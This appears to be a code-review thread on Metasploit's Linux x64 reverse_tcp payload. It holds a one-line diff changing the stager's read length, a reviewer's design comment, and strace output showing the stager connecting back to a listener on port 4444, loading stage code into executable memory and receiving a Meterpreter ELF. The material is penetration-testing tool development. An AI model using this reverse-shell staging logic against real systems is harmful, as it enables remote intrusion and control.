lib/msf/core/payload/linux/x64/reverse_tcp.rb

```diff
@@ -88,6 +88,7 @@ def asm_reverse_tcp(opts={})
     seconds = (opts[:sleep_seconds] || 5.0)
     sleep_seconds = seconds.to_i
     sleep_nanoseconds = (seconds % 1 * 1000000000).to_i
+    read_length =  respond_to?(:generate_intermediate_stage) ? generate_intermediate_stage(payload).size : 4096
```

Comment:
'generate_intermediate_stage' here is expecting an elf file as the 'payload'. Rather than exposing the generator method and getting the size, it might be better to expose a method like 'intermediate_stage_size' so the details about generating the elf file offset calculation stay in the stage module.

Reply:
Works properly now:
```
# strace ./met64-1 
execve("./met64-1", ["./met64-1"], [/* 20 vars */]) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0) = 0x7f4b5de17000
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("127.0.2.2")}, 16) = 0
read(3, "WH1\377H\307\306\344).\0H\307\302\7\0\0\0I\307\302\"\0\0\0M1\300M1\311H"..., 126) = 126
mmap(NULL, 3025380, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0) = 0x7f4b5db34000
recvfrom(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\330\217\0\0\0\0\0\0"..., 3025380, MSG_WAITALL, NULL, NULL) = 3025380
arch_prctl(ARCH_SET_FS, 0x7f4b5de16518) = 0
set_tid_address(0x7f4b5de16550)         = 25483
brk(0)                                  = 0x2210000
brk(0x2211000)                          = 0x2211000
rt_sigaction(SIGPIPE, {SIG_IGN, [], SA_RESTORER|SA_RESTART, 0x7f4b5dbc5ec1}, {SIG_DFL, [], 0}, 8) = 0
```
.... note the read size is now set to _126_ instead of _4096_.